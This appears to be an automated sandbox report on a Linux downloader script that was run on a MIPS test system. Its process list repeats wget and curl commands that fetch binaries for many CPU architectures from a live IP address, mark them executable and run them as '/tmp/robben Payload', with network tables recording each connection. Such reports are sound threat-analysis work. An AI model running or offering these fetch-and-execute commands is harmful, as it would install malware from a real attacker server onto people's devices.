/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-mipsel-20240611-en
Max time kernel
231s
Max time network
232s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-26095d1add1b47e9833694eda255f6a0-systemd-timedated.service-6LrYtP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |